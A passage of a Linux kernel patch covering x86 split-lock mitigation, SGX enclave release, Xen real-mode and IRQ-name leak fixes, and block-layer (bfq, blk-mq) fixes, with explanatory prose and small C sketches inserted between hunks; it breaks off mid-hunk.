+@@ -91,6 +91,7 @@ static inline void set_real_mode_mem(phys_addr_t mem)
+ 
+ void reserve_real_mode(void);
+ void load_trampoline_pgtable(void);
++void init_real_mode(void);
+ 
+ #endif /* __ASSEMBLY__ */
+ 
+diff --git a/arch/x86/include/asm/x86_init.h b/arch/x86/include/asm/x86_init.h
+index e9170457697e4..c1c8c581759d6 100644
+--- a/arch/x86/include/asm/x86_init.h
++++ b/arch/x86/include/asm/x86_init.h
+@@ -285,6 +285,8 @@ struct x86_hyper_runtime {
+  * 				possible in x86_early_init_platform_quirks() by
+  * 				only using the current x86_hardware_subarch
+  * 				semantics.
++ * @realmode_reserve:		reserve memory for realmode trampoline
++ * @realmode_init:		initialize realmode trampoline
+  * @hyper:			x86 hypervisor specific runtime callbacks
+  */
+ struct x86_platform_ops {
+@@ -301,6 +303,8 @@ struct x86_platform_ops {
+ 	void (*apic_post_init)(void);
+ 	struct x86_legacy_features legacy;
+ 	void (*set_legacy_features)(void);
++	void (*realmode_reserve)(void);
++	void (*realmode_init)(void);
+ 	struct x86_hyper_runtime hyper;
+ 	struct x86_guest guest;
+ };
+diff --git a/arch/x86/kernel/apic/apic.c b/arch/x86/kernel/apic/apic.c
+index c6876d3ea4b17..20d9a604da7c4 100644
+--- a/arch/x86/kernel/apic/apic.c
++++ b/arch/x86/kernel/apic/apic.c
+@@ -1931,16 +1931,19 @@ void __init check_x2apic(void)
+ 	}
+ }
+ #else /* CONFIG_X86_X2APIC */
+-static int __init validate_x2apic(void)
++void __init check_x2apic(void)
+ {
+ 	if (!apic_is_x2apic_enabled())
+-		return 0;
++		return;
+ 	/*
+-	 * Checkme: Can we simply turn off x2apic here instead of panic?
++	 * Checkme: Can we simply turn off x2APIC here instead of disabling the APIC?
+ 	 */
+-	panic("BIOS has enabled x2apic but kernel doesn't support x2apic, please disable x2apic in BIOS.\n");
++	pr_err("Kernel does not support x2APIC, please recompile with CONFIG_X86_X2APIC.\n");
++	pr_err("Disabling APIC, expect reduced performance and functionality.\n");
++
++	disable_apic = 1;
++	setup_clear_cpu_cap(X86_FEATURE_APIC);
+ }
+-early_initcall(validate_x2apic);
+ 
+ static inline void try_to_enable_x2apic(int remap_mode) { }
+ static inline void __x2apic_enable(void) { }
+diff --git a/arch/x86/kernel/cpu/intel.c b/arch/x86/kernel/cpu/intel.c
+index 2d7ea5480ec33..4278996504833 100644
+--- a/arch/x86/kernel/cpu/intel.c
++++ b/arch/x86/kernel/cpu/intel.c
+@@ -1034,8 +1034,32 @@ static const struct {
+ 
+ static struct ratelimit_state bld_ratelimit;
+ 
++static unsigned int sysctl_sld_mitigate = 1;
+ static DEFINE_SEMAPHORE(buslock_sem);
+ 
++#ifdef CONFIG_PROC_SYSCTL
++static struct ctl_table sld_sysctls[] = {
++	{
++		.procname       = "split_lock_mitigate",
++		.data           = &sysctl_sld_mitigate,
++		.maxlen         = sizeof(unsigned int),
++		.mode           = 0644,
++		.proc_handler	= proc_douintvec_minmax,
++		.extra1         = SYSCTL_ZERO,
++		.extra2         = SYSCTL_ONE,
++	},
++	{}
++};
++
++static int __init sld_mitigate_sysctl_init(void)
++{
++	register_sysctl_init("kernel", sld_sysctls);
++	return 0;
++}
++
++late_initcall(sld_mitigate_sysctl_init);
++#endif
++
+ static inline bool match_option(const char *arg, int arglen, const char *opt)
+ {
+ 	int len = strlen(opt), ratelimit;
+@@ -1146,12 +1170,20 @@ static void split_lock_init(void)
+ 		split_lock_verify_msr(sld_state != sld_off);
+ }
+ 
+-static void __split_lock_reenable(struct work_struct *work)
++static void __split_lock_reenable_unlock(struct work_struct *work)
+ {
+ 	sld_update_msr(true);
+ 	up(&buslock_sem);
+ }
+ 
++static DECLARE_DELAYED_WORK(sl_reenable_unlock, __split_lock_reenable_unlock);
++
++static void __split_lock_reenable(struct work_struct *work)
++{
++	sld_update_msr(true);
++}
++static DECLARE_DELAYED_WORK(sl_reenable, __split_lock_reenable);
++
+ /*
+  * If a CPU goes offline with pending delayed work to re-enable split lock
+  * detection then the delayed work will be executed on some other CPU. That
+@@ -1169,10 +1201,9 @@ static int splitlock_cpu_offline(unsigned int cpu)
+ 	return 0;
+ }
+ 
+-static DECLARE_DELAYED_WORK(split_lock_reenable, __split_lock_reenable);
+-
+ static void split_lock_warn(unsigned long ip)
+ {
++	struct delayed_work *work;
+ 	int cpu;
+ 
+ 	if (!current->reported_split_lock)
+@@ -1180,14 +1211,26 @@ static void split_lock_warn(unsigned long ip)
+ 				    current->comm, current->pid, ip);
+ 	current->reported_split_lock = 1;
+ 
+-	/* misery factor #1, sleep 10ms before trying to execute split lock */
+-	if (msleep_interruptible(10) > 0)
+-		return;
+-	/* Misery factor #2, only allow one buslocked disabled core at a time */
+-	if (down_interruptible(&buslock_sem) == -EINTR)
+-		return;
++	if (sysctl_sld_mitigate) {
++		/*
++		 * misery factor #1:
++		 * sleep 10ms before trying to execute split lock.
++		 */
++		if (msleep_interruptible(10) > 0)
++			return;
++		/*
++		 * Misery factor #2:
++		 * only allow one buslocked disabled core at a time.
++		 */
++		if (down_interruptible(&buslock_sem) == -EINTR)
++			return;
++		work = &sl_reenable_unlock;
++	} else {
++		work = &sl_reenable;
++	}
++
+ 	cpu = get_cpu();
+-	schedule_delayed_work_on(cpu, &split_lock_reenable, 2);
++	schedule_delayed_work_on(cpu, work, 2);
+ 
+ 	/* Disable split lock detection on this CPU to make progress */
+ 	sld_update_msr(false);
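
The new kernel.split_lock_mitigate sysctl selects between the two delayed-work items above: with the default of 1 the offending task sleeps 10 ms and the semaphore serializes to one bus-lock-disabled core at a time; with 0, detection is simply re-enabled after the delay, with no sleep and no semaphore. A minimal user of the knob — the proc path follows from register_sysctl_init("kernel", ...) in the hunk:

#include <stdio.h>

int main(void)
{
	FILE *f = fopen("/proc/sys/kernel/split_lock_mitigate", "w");

	if (!f) {
		perror("split_lock_mitigate");
		return 1;
	}
	/* 0: warn and re-enable only; 1 (default): also sleep+serialize */
	fputs("0\n", f);
	fclose(f);
	return 0;
}
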
+diff --git a/arch/x86/kernel/cpu/sgx/encl.c b/arch/x86/kernel/cpu/sgx/encl.c
+index 1ec20807de1e8..2c258255a6296 100644
+--- a/arch/x86/kernel/cpu/sgx/encl.c
++++ b/arch/x86/kernel/cpu/sgx/encl.c
+@@ -680,11 +680,15 @@ const struct vm_operations_struct sgx_vm_ops = {
+ void sgx_encl_release(struct kref *ref)
+ {
+ 	struct sgx_encl *encl = container_of(ref, struct sgx_encl, refcount);
++	unsigned long max_page_index = PFN_DOWN(encl->base + encl->size - 1);
+ 	struct sgx_va_page *va_page;
+ 	struct sgx_encl_page *entry;
+-	unsigned long index;
++	unsigned long count = 0;
++
++	XA_STATE(xas, &encl->page_array, PFN_DOWN(encl->base));
+ 
+-	xa_for_each(&encl->page_array, index, entry) {
++	xas_lock(&xas);
++	xas_for_each(&xas, entry, max_page_index) {
+ 		if (entry->epc_page) {
+ 			/*
+ 			 * The page and its radix tree entry cannot be freed
+@@ -699,9 +703,20 @@ void sgx_encl_release(struct kref *ref)
+ 		}
+ 
+ 		kfree(entry);
+-		/* Invoke scheduler to prevent soft lockups. */
+-		cond_resched();
++		/*
++		 * Invoke scheduler on every XA_CHECK_SCHED iteration
++		 * to prevent soft lockups.
++		 */
++		if (!(++count % XA_CHECK_SCHED)) {
++			xas_pause(&xas);
++			xas_unlock(&xas);
++
++			cond_resched();
++
++			xas_lock(&xas);
++		}
+ 	}
++	xas_unlock(&xas);
+ 
+ 	xa_destroy(&encl->page_array);
+ 
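
The release path now walks the enclave's page xarray under the xarray lock and, every XA_CHECK_SCHED entries, parks the iterator with xas_pause(), drops the lock, and calls cond_resched() before relocking — bounding both lock hold time and scheduling latency on huge enclaves. A userspace analogue of that batched lock-drop pattern, with pthread stand-ins for the kernel primitives:

#include <pthread.h>
#include <sched.h>
#include <stdio.h>

#define NPAGES 10000
#define CHECK_SCHED 4096   /* stand-in for XA_CHECK_SCHED */

static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;

static void release_all(void)
{
	unsigned long count = 0, i;

	pthread_mutex_lock(&lock);
	for (i = 0; i < NPAGES; i++) {
		/* ... free entry i ... */
		if (!(++count % CHECK_SCHED)) {
			/* xas_pause() equivalent: position survives */
			pthread_mutex_unlock(&lock);
			sched_yield();          /* cond_resched() */
			pthread_mutex_lock(&lock);
		}
	}
	pthread_mutex_unlock(&lock);
	printf("released %lu pages\n", count);
}

int main(void)
{
	release_all();
	return 0;
}
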
+diff --git a/arch/x86/kernel/setup.c b/arch/x86/kernel/setup.c
+index 216fee7144eef..892609cde4a20 100644
+--- a/arch/x86/kernel/setup.c
++++ b/arch/x86/kernel/setup.c
+@@ -1175,7 +1175,7 @@ void __init setup_arch(char **cmdline_p)
+ 	 * Moreover, on machines with SandyBridge graphics or in setups that use
+ 	 * crashkernel the entire 1M is reserved anyway.
+ 	 */
+-	reserve_real_mode();
++	x86_platform.realmode_reserve();
+ 
+ 	init_mem_mapping();
+ 
+diff --git a/arch/x86/kernel/uprobes.c b/arch/x86/kernel/uprobes.c
+index b63cf8f7745ee..6c07f6daaa227 100644
+--- a/arch/x86/kernel/uprobes.c
++++ b/arch/x86/kernel/uprobes.c
+@@ -722,8 +722,9 @@ static int branch_setup_xol_ops(struct arch_uprobe *auprobe, struct insn *insn)
+ 	switch (opc1) {
+ 	case 0xeb:	/* jmp 8 */
+ 	case 0xe9:	/* jmp 32 */
+-	case 0x90:	/* prefix* + nop; same as jmp with .offs = 0 */
+ 		break;
++	case 0x90:	/* prefix* + nop; same as jmp with .offs = 0 */
++		goto setup;
+ 
+ 	case 0xe8:	/* call relative */
+ 		branch_clear_offset(auprobe, insn);
+@@ -753,6 +754,7 @@ static int branch_setup_xol_ops(struct arch_uprobe *auprobe, struct insn *insn)
+ 			return -ENOTSUPP;
+ 	}
+ 
++setup:
+ 	auprobe->branch.opc1 = opc1;
+ 	auprobe->branch.ilen = insn->length;
+ 	auprobe->branch.offs = insn->immediate.value;
+diff --git a/arch/x86/kernel/x86_init.c b/arch/x86/kernel/x86_init.c
+index 57353519bc119..ef80d361b4632 100644
+--- a/arch/x86/kernel/x86_init.c
++++ b/arch/x86/kernel/x86_init.c
+@@ -25,6 +25,7 @@
+ #include <asm/iommu.h>
+ #include <asm/mach_traps.h>
+ #include <asm/irqdomain.h>
++#include <asm/realmode.h>
+ 
+ void x86_init_noop(void) { }
+ void __init x86_init_uint_noop(unsigned int unused) { }
+@@ -145,6 +146,8 @@ struct x86_platform_ops x86_platform __ro_after_init = {
+ 	.get_nmi_reason			= default_get_nmi_reason,
+ 	.save_sched_clock_state		= tsc_save_sched_clock_state,
+ 	.restore_sched_clock_state	= tsc_restore_sched_clock_state,
++	.realmode_reserve		= reserve_real_mode,
++	.realmode_init			= init_real_mode,
+ 	.hyper.pin_vcpu			= x86_op_int_noop,
+ 
+ 	.guest = {
+diff --git a/arch/x86/realmode/init.c b/arch/x86/realmode/init.c
+index 41d7669a97ad1..af565816d2ba6 100644
+--- a/arch/x86/realmode/init.c
++++ b/arch/x86/realmode/init.c
+@@ -200,14 +200,18 @@ static void __init set_real_mode_permissions(void)
+ 	set_memory_x((unsigned long) text_start, text_size >> PAGE_SHIFT);
+ }
+ 
+-static int __init init_real_mode(void)
++void __init init_real_mode(void)
+ {
+ 	if (!real_mode_header)
+ 		panic("Real mode trampoline was not allocated");
+ 
+ 	setup_real_mode();
+ 	set_real_mode_permissions();
++}
+ 
++static int __init do_init_real_mode(void)
++{
++	x86_platform.realmode_init();
+ 	return 0;
+ }
+-early_initcall(init_real_mode);
++early_initcall(do_init_real_mode);
+diff --git a/arch/x86/xen/enlighten_pv.c b/arch/x86/xen/enlighten_pv.c
+index 038da45f057a7..8944726255c9c 100644
+--- a/arch/x86/xen/enlighten_pv.c
++++ b/arch/x86/xen/enlighten_pv.c
+@@ -1266,6 +1266,8 @@ asmlinkage __visible void __init xen_start_kernel(struct start_info *si)
+ 	xen_vcpu_info_reset(0);
+ 
+ 	x86_platform.get_nmi_reason = xen_get_nmi_reason;
++	x86_platform.realmode_reserve = x86_init_noop;
++	x86_platform.realmode_init = x86_init_noop;
+ 
+ 	x86_init.resources.memory_setup = xen_memory_setup;
+ 	x86_init.irqs.intr_mode_select	= x86_init_noop;
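
Taken together, the setup.c, x86_init.c, realmode/init.c and enlighten_pv.c hunks turn real-mode trampoline setup into x86_platform ops, with reserve_real_mode()/init_real_mode() as the defaults, so a Xen PV guest — which has no real mode — can replace both with x86_init_noop before they run. The shape of that indirection as a standalone sketch:

#include <stdio.h>

static void reserve_real_mode(void) { puts("reserving trampoline"); }
static void init_real_mode(void)    { puts("setting up trampoline"); }
static void noop(void)              { }

struct platform_ops {
	void (*realmode_reserve)(void);
	void (*realmode_init)(void);
};

/* defaults, as installed in x86_init.c */
static struct platform_ops x86_platform = {
	.realmode_reserve = reserve_real_mode,
	.realmode_init    = init_real_mode,
};

static void xen_start_kernel(void)   /* PV guest: stub both out */
{
	x86_platform.realmode_reserve = noop;
	x86_platform.realmode_init    = noop;
}

int main(void)
{
	xen_start_kernel();               /* comment out for bare metal */
	x86_platform.realmode_reserve();  /* called from setup_arch() */
	x86_platform.realmode_init();     /* called via early_initcall */
	return 0;
}
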
+diff --git a/arch/x86/xen/smp.c b/arch/x86/xen/smp.c
+index c3e1f9a7d43aa..4b0d6fff88de5 100644
+--- a/arch/x86/xen/smp.c
++++ b/arch/x86/xen/smp.c
+@@ -32,30 +32,30 @@ static irqreturn_t xen_reschedule_interrupt(int irq, void *dev_id)
+ 
+ void xen_smp_intr_free(unsigned int cpu)
+ {
++	kfree(per_cpu(xen_resched_irq, cpu).name);
++	per_cpu(xen_resched_irq, cpu).name = NULL;
+ 	if (per_cpu(xen_resched_irq, cpu).irq >= 0) {
+ 		unbind_from_irqhandler(per_cpu(xen_resched_irq, cpu).irq, NULL);
+ 		per_cpu(xen_resched_irq, cpu).irq = -1;
+-		kfree(per_cpu(xen_resched_irq, cpu).name);
+-		per_cpu(xen_resched_irq, cpu).name = NULL;
+ 	}
++	kfree(per_cpu(xen_callfunc_irq, cpu).name);
++	per_cpu(xen_callfunc_irq, cpu).name = NULL;
+ 	if (per_cpu(xen_callfunc_irq, cpu).irq >= 0) {
+ 		unbind_from_irqhandler(per_cpu(xen_callfunc_irq, cpu).irq, NULL);
+ 		per_cpu(xen_callfunc_irq, cpu).irq = -1;
+-		kfree(per_cpu(xen_callfunc_irq, cpu).name);
+-		per_cpu(xen_callfunc_irq, cpu).name = NULL;
+ 	}
++	kfree(per_cpu(xen_debug_irq, cpu).name);
++	per_cpu(xen_debug_irq, cpu).name = NULL;
+ 	if (per_cpu(xen_debug_irq, cpu).irq >= 0) {
+ 		unbind_from_irqhandler(per_cpu(xen_debug_irq, cpu).irq, NULL);
+ 		per_cpu(xen_debug_irq, cpu).irq = -1;
+-		kfree(per_cpu(xen_debug_irq, cpu).name);
+-		per_cpu(xen_debug_irq, cpu).name = NULL;
+ 	}
++	kfree(per_cpu(xen_callfuncsingle_irq, cpu).name);
++	per_cpu(xen_callfuncsingle_irq, cpu).name = NULL;
+ 	if (per_cpu(xen_callfuncsingle_irq, cpu).irq >= 0) {
+ 		unbind_from_irqhandler(per_cpu(xen_callfuncsingle_irq, cpu).irq,
+ 				       NULL);
+ 		per_cpu(xen_callfuncsingle_irq, cpu).irq = -1;
+-		kfree(per_cpu(xen_callfuncsingle_irq, cpu).name);
+-		per_cpu(xen_callfuncsingle_irq, cpu).name = NULL;
+ 	}
+ }
+ 
+@@ -65,6 +65,7 @@ int xen_smp_intr_init(unsigned int cpu)
+ 	char *resched_name, *callfunc_name, *debug_name;
+ 
+ 	resched_name = kasprintf(GFP_KERNEL, "resched%d", cpu);
++	per_cpu(xen_resched_irq, cpu).name = resched_name;
+ 	rc = bind_ipi_to_irqhandler(XEN_RESCHEDULE_VECTOR,
+ 				    cpu,
+ 				    xen_reschedule_interrupt,
+@@ -74,9 +75,9 @@ int xen_smp_intr_init(unsigned int cpu)
+ 	if (rc < 0)
+ 		goto fail;
+ 	per_cpu(xen_resched_irq, cpu).irq = rc;
+-	per_cpu(xen_resched_irq, cpu).name = resched_name;
+ 
+ 	callfunc_name = kasprintf(GFP_KERNEL, "callfunc%d", cpu);
++	per_cpu(xen_callfunc_irq, cpu).name = callfunc_name;
+ 	rc = bind_ipi_to_irqhandler(XEN_CALL_FUNCTION_VECTOR,
+ 				    cpu,
+ 				    xen_call_function_interrupt,
+@@ -86,10 +87,10 @@ int xen_smp_intr_init(unsigned int cpu)
+ 	if (rc < 0)
+ 		goto fail;
+ 	per_cpu(xen_callfunc_irq, cpu).irq = rc;
+-	per_cpu(xen_callfunc_irq, cpu).name = callfunc_name;
+ 
+ 	if (!xen_fifo_events) {
+ 		debug_name = kasprintf(GFP_KERNEL, "debug%d", cpu);
++		per_cpu(xen_debug_irq, cpu).name = debug_name;
+ 		rc = bind_virq_to_irqhandler(VIRQ_DEBUG, cpu,
+ 					     xen_debug_interrupt,
+ 					     IRQF_PERCPU | IRQF_NOBALANCING,
+@@ -97,10 +98,10 @@ int xen_smp_intr_init(unsigned int cpu)
+ 		if (rc < 0)
+ 			goto fail;
+ 		per_cpu(xen_debug_irq, cpu).irq = rc;
+-		per_cpu(xen_debug_irq, cpu).name = debug_name;
+ 	}
+ 
+ 	callfunc_name = kasprintf(GFP_KERNEL, "callfuncsingle%d", cpu);
++	per_cpu(xen_callfuncsingle_irq, cpu).name = callfunc_name;
+ 	rc = bind_ipi_to_irqhandler(XEN_CALL_FUNCTION_SINGLE_VECTOR,
+ 				    cpu,
+ 				    xen_call_function_single_interrupt,
+@@ -110,7 +111,6 @@ int xen_smp_intr_init(unsigned int cpu)
+ 	if (rc < 0)
+ 		goto fail;
+ 	per_cpu(xen_callfuncsingle_irq, cpu).irq = rc;
+-	per_cpu(xen_callfuncsingle_irq, cpu).name = callfunc_name;
+ 
+ 	return 0;
+ 
+diff --git a/arch/x86/xen/smp_pv.c b/arch/x86/xen/smp_pv.c
+index 480be82e9b7be..6175f2c5c8224 100644
+--- a/arch/x86/xen/smp_pv.c
++++ b/arch/x86/xen/smp_pv.c
+@@ -97,18 +97,18 @@ asmlinkage __visible void cpu_bringup_and_idle(void)
+ 
+ void xen_smp_intr_free_pv(unsigned int cpu)
+ {
++	kfree(per_cpu(xen_irq_work, cpu).name);
++	per_cpu(xen_irq_work, cpu).name = NULL;
+ 	if (per_cpu(xen_irq_work, cpu).irq >= 0) {
+ 		unbind_from_irqhandler(per_cpu(xen_irq_work, cpu).irq, NULL);
+ 		per_cpu(xen_irq_work, cpu).irq = -1;
+-		kfree(per_cpu(xen_irq_work, cpu).name);
+-		per_cpu(xen_irq_work, cpu).name = NULL;
+ 	}
+ 
++	kfree(per_cpu(xen_pmu_irq, cpu).name);
++	per_cpu(xen_pmu_irq, cpu).name = NULL;
+ 	if (per_cpu(xen_pmu_irq, cpu).irq >= 0) {
+ 		unbind_from_irqhandler(per_cpu(xen_pmu_irq, cpu).irq, NULL);
+ 		per_cpu(xen_pmu_irq, cpu).irq = -1;
+-		kfree(per_cpu(xen_pmu_irq, cpu).name);
+-		per_cpu(xen_pmu_irq, cpu).name = NULL;
+ 	}
+ }
+ 
+@@ -118,6 +118,7 @@ int xen_smp_intr_init_pv(unsigned int cpu)
+ 	char *callfunc_name, *pmu_name;
+ 
+ 	callfunc_name = kasprintf(GFP_KERNEL, "irqwork%d", cpu);
++	per_cpu(xen_irq_work, cpu).name = callfunc_name;
+ 	rc = bind_ipi_to_irqhandler(XEN_IRQ_WORK_VECTOR,
+ 				    cpu,
+ 				    xen_irq_work_interrupt,
+@@ -127,10 +128,10 @@ int xen_smp_intr_init_pv(unsigned int cpu)
+ 	if (rc < 0)
+ 		goto fail;
+ 	per_cpu(xen_irq_work, cpu).irq = rc;
+-	per_cpu(xen_irq_work, cpu).name = callfunc_name;
+ 
+ 	if (is_xen_pmu) {
+ 		pmu_name = kasprintf(GFP_KERNEL, "pmu%d", cpu);
++		per_cpu(xen_pmu_irq, cpu).name = pmu_name;
+ 		rc = bind_virq_to_irqhandler(VIRQ_XENPMU, cpu,
+ 					     xen_pmu_irq_handler,
+ 					     IRQF_PERCPU|IRQF_NOBALANCING,
+@@ -138,7 +139,6 @@ int xen_smp_intr_init_pv(unsigned int cpu)
+ 		if (rc < 0)
+ 			goto fail;
+ 		per_cpu(xen_pmu_irq, cpu).irq = rc;
+-		per_cpu(xen_pmu_irq, cpu).name = pmu_name;
+ 	}
+ 
+ 	return 0;
+diff --git a/arch/x86/xen/spinlock.c b/arch/x86/xen/spinlock.c
+index 043c73dfd2c98..5c6fc16e4b925 100644
+--- a/arch/x86/xen/spinlock.c
++++ b/arch/x86/xen/spinlock.c
+@@ -75,6 +75,7 @@ void xen_init_lock_cpu(int cpu)
+ 	     cpu, per_cpu(lock_kicker_irq, cpu));
+ 
+ 	name = kasprintf(GFP_KERNEL, "spinlock%d", cpu);
++	per_cpu(irq_name, cpu) = name;
+ 	irq = bind_ipi_to_irqhandler(XEN_SPIN_UNLOCK_VECTOR,
+ 				     cpu,
+ 				     dummy_handler,
+@@ -85,7 +86,6 @@ void xen_init_lock_cpu(int cpu)
+ 	if (irq >= 0) {
+ 		disable_irq(irq); /* make sure it's never delivered */
+ 		per_cpu(lock_kicker_irq, cpu) = irq;
+-		per_cpu(irq_name, cpu) = name;
+ 	}
+ 
+ 	printk("cpu %d spinlock event irq %d\n", cpu, irq);
+@@ -98,6 +98,8 @@ void xen_uninit_lock_cpu(int cpu)
+ 	if (!xen_pvspin)
+ 		return;
+ 
++	kfree(per_cpu(irq_name, cpu));
++	per_cpu(irq_name, cpu) = NULL;
+ 	/*
+ 	 * When booting the kernel with 'mitigations=auto,nosmt', the secondary
+ 	 * CPUs are not activated, and lock_kicker_irq is not initialized.
+@@ -108,8 +110,6 @@ void xen_uninit_lock_cpu(int cpu)
+ 
+ 	unbind_from_irqhandler(irq, NULL);
+ 	per_cpu(lock_kicker_irq, cpu) = -1;
+-	kfree(per_cpu(irq_name, cpu));
+-	per_cpu(irq_name, cpu) = NULL;
+ }
+ 
+ PV_CALLEE_SAVE_REGS_THUNK(xen_vcpu_stolen);
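
The smp.c, smp_pv.c and spinlock.c hunks all apply one rule: store the kasprintf()'d name in the per-cpu slot before the bind call, and free it unconditionally in the teardown path, so a bind failure can no longer leak the string (previously the name was recorded, and therefore freed, only on success). A minimal model of the ordering:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct irq_info { int irq; char *name; };

static void intr_free(struct irq_info *i)
{
	free(i->name);       /* safe even if bind never succeeded */
	i->name = NULL;
	if (i->irq >= 0)
		i->irq = -1;
}

static int intr_init(struct irq_info *i, int bind_ok)
{
	i->name = strdup("resched0");   /* record before binding */
	if (!bind_ok) {
		intr_free(i);           /* error path frees the name */
		return -1;
	}
	i->irq = 42;
	return 0;
}

int main(void)
{
	struct irq_info i = { .irq = -1, .name = NULL };

	if (intr_init(&i, 0))
		puts("bind failed, no leak");
	if (!intr_init(&i, 1))
		intr_free(&i);
	return 0;
}
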
+diff --git a/block/bfq-iosched.c b/block/bfq-iosched.c
+index 7ea427817f7f5..3e3bd1a466464 100644
+--- a/block/bfq-iosched.c
++++ b/block/bfq-iosched.c
+@@ -386,6 +386,12 @@ static void bfq_put_stable_ref(struct bfq_queue *bfqq);
+ 
+ void bic_set_bfqq(struct bfq_io_cq *bic, struct bfq_queue *bfqq, bool is_sync)
+ {
++	struct bfq_queue *old_bfqq = bic->bfqq[is_sync];
++
++	/* Clear bic pointer if bfqq is detached from this bic */
++	if (old_bfqq && old_bfqq->bic == bic)
++		old_bfqq->bic = NULL;
++
+ 	/*
+ 	 * If bfqq != NULL, then a non-stable queue merge between
+ 	 * bic->bfqq and bfqq is happening here. This causes troubles
+@@ -5377,7 +5383,6 @@ static void bfq_exit_icq_bfqq(struct bfq_io_cq *bic, bool is_sync)
+ 		unsigned long flags;
+ 
+ 		spin_lock_irqsave(&bfqd->lock, flags);
+-		bfqq->bic = NULL;
+ 		bfq_exit_bfqq(bfqd, bfqq);
+ 		bic_set_bfqq(bic, NULL, is_sync);
+ 		spin_unlock_irqrestore(&bfqd->lock, flags);
+@@ -6784,6 +6789,12 @@ static struct bfq_queue *bfq_init_rq(struct request *rq)
+ 				bfqq = bfq_get_bfqq_handle_split(bfqd, bic, bio,
+ 								 true, is_sync,
+ 								 NULL);
++				if (unlikely(bfqq == &bfqd->oom_bfqq))
++					bfqq_already_existing = true;
++			} else
++				bfqq_already_existing = true;
++
++			if (!bfqq_already_existing) {
+ 				bfqq->waker_bfqq = old_bfqq->waker_bfqq;
+ 				bfqq->tentative_waker_bfqq = NULL;
+ 
+@@ -6797,8 +6808,7 @@ static struct bfq_queue *bfq_init_rq(struct request *rq)
+ 				if (bfqq->waker_bfqq)
+ 					hlist_add_head(&bfqq->woken_list_node,
+ 						       &bfqq->waker_bfqq->woken_list);
+-			} else
+-				bfqq_already_existing = true;
++			}
+ 		}
+ 	}
+ 
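
bic_set_bfqq() now clears the old queue's bic back-pointer whenever the bic is re-pointed, instead of relying on the exit path, closing a window in which a freed bic could still be reachable through bfqq->bic. A generic two-way-link model of that invariant — this sketches the pattern, not bfq's exact code:

#include <assert.h>
#include <stddef.h>

struct queue;
struct owner { struct queue *q; };
struct queue { struct owner *back; };

static void repoint(struct owner *o, struct queue *newq)
{
	struct queue *old = o->q;

	if (old && old->back == o)
		old->back = NULL;    /* never leave a stale back-pointer */
	o->q = newq;
	if (newq)
		newq->back = o;
}

int main(void)
{
	struct queue a = { 0 }, b = { 0 };
	struct owner o = { 0 };

	repoint(&o, &a);
	repoint(&o, &b);     /* 'a' must forget 'o' here */
	assert(a.back == NULL && b.back == &o);
	return 0;
}
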
+diff --git a/block/blk-cgroup.c b/block/blk-cgroup.c
+index ed761c62ad0a7..fcf9cf49f5de1 100644
+--- a/block/blk-cgroup.c
++++ b/block/blk-cgroup.c
+@@ -33,6 +33,7 @@
+ #include "blk-cgroup.h"
+ #include "blk-ioprio.h"
+ #include "blk-throttle.h"
++#include "blk-rq-qos.h"
+ 
+ /*
+  * blkcg_pol_mutex protects blkcg_policy[] and policy [de]activation.
+@@ -1275,6 +1276,7 @@ err_unlock:
+ void blkcg_exit_disk(struct gendisk *disk)
+ {
+ 	blkg_destroy_all(disk);
++	rq_qos_exit(disk->queue);
+ 	blk_throtl_exit(disk);
+ }
+ 
+diff --git a/block/blk-mq-sysfs.c b/block/blk-mq-sysfs.c
+index 93997d297d427..4515288fbe351 100644
+--- a/block/blk-mq-sysfs.c
++++ b/block/blk-mq-sysfs.c
+@@ -185,7 +185,7 @@ static int blk_mq_register_hctx(struct blk_mq_hw_ctx *hctx)
+ {
+ 	struct request_queue *q = hctx->queue;
+ 	struct blk_mq_ctx *ctx;
+-	int i, ret;
++	int i, j, ret;
+ 
+ 	if (!hctx->nr_ctx)
+ 		return 0;
+@@ -197,9 +197,16 @@ static int blk_mq_register_hctx(struct blk_mq_hw_ctx *hctx)
+ 	hctx_for_each_ctx(hctx, ctx, i) {
+ 		ret = kobject_add(&ctx->kobj, &hctx->kobj, "cpu%u", ctx->cpu);
+ 		if (ret)
+-			break;
++			goto out;
+ 	}
+ 
++	return 0;
++out:
++	hctx_for_each_ctx(hctx, ctx, j) {
++		if (j < i)
++			kobject_del(&ctx->kobj);
++	}
++	kobject_del(&hctx->kobj);
+ 	return ret;
+ }
+ 
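
The fixed blk_mq_register_hctx() no longer leaves earlier per-ctx kobjects registered when a later kobject_add() fails: the error path deletes exactly the first i entries, then the hctx kobject itself. The generic unwind shape, as a runnable sketch:

#include <stdio.h>

#define N 4

static int add_item(int i) { return i == 2 ? -1 : 0; }  /* fail at #2 */
static void del_item(int i) { printf("del %d\n", i); }

static int register_all(void)
{
	int i, j, ret = 0;

	for (i = 0; i < N; i++) {
		ret = add_item(i);
		if (ret)
			goto out;
	}
	return 0;
out:
	for (j = 0; j < i; j++)   /* undo only what was actually added */
		del_item(j);
	return ret;
}

int main(void) { return register_all() ? 1 : 0; }
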
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index 228a6696d8351..0b855e033a834 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -1529,7 +1529,13 @@ static void blk_mq_rq_timed_out(struct request *req)
+ 	blk_add_timer(req);
+ }
+ 
+-static bool blk_mq_req_expired(struct request *rq, unsigned long *next)
++struct blk_expired_data {
++	bool has_timedout_rq;
++	unsigned long next;
++	unsigned long timeout_start;
++};
++
++static bool blk_mq_req_expired(struct request *rq, struct blk_expired_data *expired)
+ {
+ 	unsigned long deadline;
+ 
+@@ -1539,13 +1545,13 @@ static bool blk_mq_req_expired(struct request *rq, unsigned long *next)
+ 		return false;
+ 
+ 	deadline = READ_ONCE(rq->deadline);
+-	if (time_after_eq(jiffies, deadline))
++	if (time_after_eq(expired->timeout_start, deadline))
+ 		return true;
+ 
+-	if (*next == 0)
+-		*next = deadline;
+-	else if (time_after(*next, deadline))
+-		*next = deadline;
++	if (expired->next == 0)
++		expired->next = deadline;
++	else if (time_after(expired->next, deadline))
++		expired->next = deadline;
+ 	return false;
+ }
+ 
+@@ -1561,7 +1567,7 @@ void blk_mq_put_rq_ref(struct request *rq)
+ 
+ static bool blk_mq_check_expired(struct request *rq, void *priv)
+ {
+-	unsigned long *next = priv;
++	struct blk_expired_data *expired = priv;
+ 
+ 	/*
+ 	 * blk_mq_queue_tag_busy_iter() has locked the request, so it cannot
+@@ -1570,7 +1576,18 @@ static bool blk_mq_check_expired(struct request *rq, void *priv)
+ 	 * it was completed and reallocated as a new request after returning
+ 	 * from blk_mq_check_expired().
+ 	 */
+-	if (blk_mq_req_expired(rq, next))
